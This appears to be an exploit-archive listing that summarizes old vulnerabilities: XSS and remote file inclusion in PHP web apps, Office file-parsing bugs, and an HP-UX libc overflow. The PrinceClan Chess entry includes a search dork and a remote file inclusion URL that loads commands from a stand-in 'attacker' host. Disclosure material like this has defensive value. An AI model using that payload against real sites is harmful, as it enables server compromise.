Hacking AJAX DWR Applications
By Guy Karlebach & Amichai Shulman Introduction The introduction of AJAX into a web application improves the user experience significantly. However, the complexity of some AJAX frameworks and the limited field experience with them requires a careful examination of potential vulnerabilities. DWR i...
GenesisTrader 1.0 - form.php Multiple Cross-Site Scripting Vulnerabilities
GenesisTrader 1.0 - form.php Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/21595/info GenesisTrader is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues include...
CVE-2006-6276
HTTP request smuggling vulnerability in Sun Java System Proxy Server before 20061130, when used with Sun Java System Application Server or Sun Java System Web Server, allows remote attackers to bypass HTTP request filtering, hijack web sessions, perform cross-site scripting (XSS), and poison web...
encapscms 0.3.6 - Remote File Include by Firewall
Firewall encapscms 0.3.6 - Remote File Include by Firewall BuG FounD by Firewall Application Affect: encapscms 0.3.6 Source Code: http://scripts.ringsworld.com/content-management/encapscms-0.3.6.zip Code: includeonce$root."core/Config.php"; includeonce$root."core/DBsql.php";...
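Microsoft Outlook Express Windows Address Book File Parsing Overflow Vulnerability (MS06-016)
Microsoft Outlook Express is the mail and newsgroup client bundled with the Microsoft Windows operating system. Microsoft Outlook Express has a heap overflow vulnerability when parsing specially crafted Windows Address Book (.wab) files; an attacker can trick a user into opening a specially crafted .wab file, resulting in arbitrary code execution on the user's system. Microsoft Outlook Express 5.5 SP2 - Microsoft Windows 2000 SP4 Microsoft Outlook Express 6.0 - Microsoft Windows XP SP2 - Microsoft Windows...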
HP-UX 11i (LIBC TZ environment variable) Local Root Exploit
No description provided by source. / HP-UX libc timezone environment overflow exploit ================================================ HP-UX libc contains an exploitable stack overflow in the handling of "TZ" environment variable. The problem occurs due to insufficient bounds checking in the...
HP-UX 11i - 'LIBC TZ' Environment Variable Privilege Escalation
/ HP-UX libc timezone environment overflow exploit ================================================ HP-UX libc contains an exploitable stack overflow in the handling of "TZ" environment variable. The problem occurs due to insufficient bounds checking in the localtimer and related functions. Any...
Another Mambo module remote inclusion vulnerability
Bug Found by h4ntu http://h4ntu.com batamhacker crew Another Mambo module remote inclusion vulnerability download : http://mamboxchange.com/frs/download.php/1498/MambWeather181.zip bug found in file : MambWeather/Savant2/Savant2Pluginoptions.php ?php / Base plugin class. / global...
Buzlas 2006-1 Full - Archive_Topic.php Remote File Inclusion
Buzlas 2006-1 Full - ArchiveTopic.php Remote File Inclusion source: https://www.securityfocus.com/bid/20511/info Buzlas is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the...
CVE-2006-4694
Unspecified vulnerability in PowerPoint in Microsoft Office 2000, Office XP and Office 2003 allows user-assisted attackers to execute arbitrary code via a crafted record in a PPT file, as exploited by malware such as Exploit:Win32/Controlppt.W, Exploit:Win32/Controlppt.X, and...
CVE-2006-4990
CVE-2006-4990 describes PHP remote file inclusion vulnerabilities in PhotoPost 4.0–4.6 where an attacker can execute arbitrary PHP code by supplying a URL to the PP_PATH parameter across multiple PHP scripts (e.g., zipndownload.php and others). The issue enables code execution via network access ...
e107 website system 0.7.5 - 'search.php?Query String (PATH_INFO)' Cross-Site Scripting
source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user i...
Mambo Component PrinceClan Chess 0.8 - Remote File Inclusion
pcchess Component - dork : index.php?option=compcchess - exploit : http://target/path/components/compcchess/include.pcchess.php?mosConfigabsolutepath=http://attacker/cmd.txt?&cmd=ls milw0rm.com 2006-07-24...
Microsoft Excel OBJECT Record Remote Code Execution Vulnerability
Description Microsoft Excel is prone to a remote code-execution vulnerability because it fails to handle exceptional conditions. Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users. Note that Microsoft Office...
Microsoft Excel COLINFO Record Remote Code Execution Vulnerability
Description Microsoft Excel is prone to a remote code-execution vulnerability because it fails to handle exceptional conditions. Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users. Note that Microsoft Office...
Microsoft Excel LABEL Record Remote Code Execution Vulnerability
Description Microsoft Excel is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users. Note that Microsoft Office applications include functionality to embed Offic...
Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution
Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution source: https://www.securityfocus.com/bid/18872/info Microsoft Excel is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to execute arbitrary code in the context of...
Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution
source: https://www.securityfocus.com/bid/18872/info Microsoft Excel is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to execute arbitrary code in the context of targeted users. A proof-of-concept malicious code named 'Trojan.Hongmosa' is...
Cisco Secure ACS 2.3 - LoginProxy.cgi Cross-Site Scripting
Cisco Secure ACS 2.3 - LoginProxy.cgi Cross-Site Scripting source: https://www.securityfocus.com/bid/18449/info Cisco Secure ACS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage...
Manic Web MWGuest 2.1 - MWguest.php HTML Injection
Manic Web MWGuest 2.1 - MWguest.php HTML Injection source: https://www.securityfocus.com/bid/17630/info MWGuest is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HT...